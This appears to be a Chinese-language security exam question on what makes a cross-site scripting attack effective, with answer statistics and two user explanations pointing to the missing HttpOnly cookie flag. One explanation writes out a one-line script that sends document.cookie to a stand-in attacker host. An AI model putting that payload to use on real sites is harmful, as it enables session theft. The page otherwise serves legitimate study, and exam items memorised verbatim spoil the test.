4. 一位資安專家正在對某公司網站進行滲透測試,在測試期間發現了一
個跨網站指令碼(Cross-Site Scripting, XSS)的網站安全漏洞,若要針
對此弱點進行有效攻擊,需同時符合下列何項條件?
(A) 網站的安全旗標(secure flag)未設定
(B) 連線期間快取(session cookie)的 HttpOnly 旗標未設定
(C) 受害電腦沒有安裝端點防護軟體
(D) 受害電腦的瀏覽器需開啟 Active D 技術
答案:登入後查看
統計: A(116), B(389), C(43), D(17), E(0) #3055625
統計: A(116), B(389), C(43), D(17), E(0) #3055625
詳解 (共 2 筆)
#6188307
A) 網站的安全旗標(secure flag)未設定: 安全旗標主要用於確保 cookie 只通過 HTTPS 傳輸。雖然這是一個重要的安全措施,但它主要防止的是中間人攻擊,而不是直接防止 XSS。因此,這不是 XSS 攻擊成功的必要條件。
B) 連線期間快取(session cookie)的 HttpOnly 旗標未設定: 這是一個關鍵條件。HttpOnly 旗標防止客戶端腳本訪問 cookie。如果這個旗標未設定,攻擊者的 XSS 腳本就可以讀取和竊取 session cookie,這通常是 XSS 攻擊的主要目標之一。因此,這是使 XSS 攻擊更有效的重要條件。
C) 受害電腦沒有安裝端點防護軟體: 雖然端點防護軟體可能會提供一些額外的安全層,但它通常不能完全防止 XSS 攻擊。XSS 主要是利用網站的漏洞,而不是客戶端系統的漏洞。因此,這不是 XSS 攻擊成功的必要條件。
D) 受害電腦的瀏覽器需開啟 Active D 技術: 這個選項似乎有些混淆或錯誤。沒有一個被廣泛認知的 "Active D" 技術與瀏覽器安全相關。可能是指 ActiveX,但即使是 ActiveX,它也不是現代 XSS 攻擊所必需的。現代的 XSS 攻擊通常不依賴於特定的瀏覽器技術。
1
0
#7329579
這題的正確答案是 (B) 連線期間快取(session cookie)的 HttpOnly 旗標未設定。
以下是為什麼這項條件對「有效攻擊」至關重要的原因:
ㅤㅤ
1. XSS 攻擊的核心目標:竊取 Session Cookie
跨網站指令碼(XSS)最常見且最具殺傷力的攻擊手法,就是透過惡意腳本(JavaScript)讀取受害者的 document.cookie,進而盜取登入憑證(Session ID),達成會話劫持(Session Hijacking)。
ㅤㅤ
2. HttpOnly 旗標的作用
- 若設定了 HttpOnly:瀏覽器會禁止 JavaScript 存取該 Cookie。即使駭客成功植入了 XSS 腳本,腳本也無法讀取到 Session ID,攻擊威力會被大幅削減。
- 若未設定 HttpOnly:攻擊者只需一行程式碼 new Image().src = "http://attacker.com" + document.cookie; 就能輕鬆將你的登入資訊傳回他的主機。
ㅤㅤ
為什麼其他選項不是主要條件?
- (A) Secure flag:這僅限制 Cookie 必須在 HTTPS 加密連線下傳輸,防止被「中間人監聽」,但無法阻止瀏覽器內的 XSS 腳本讀取它。
- (C) 端點防護軟體:傳統的防毒軟體主要針對檔案式病毒,對於在瀏覽器記憶體中執行的 XSS 腳本攔截能力有限。
- (D) Active X:這是過時的技術,與現代 XSS 攻擊的必要條件無關。
ㅤㅤ
0
0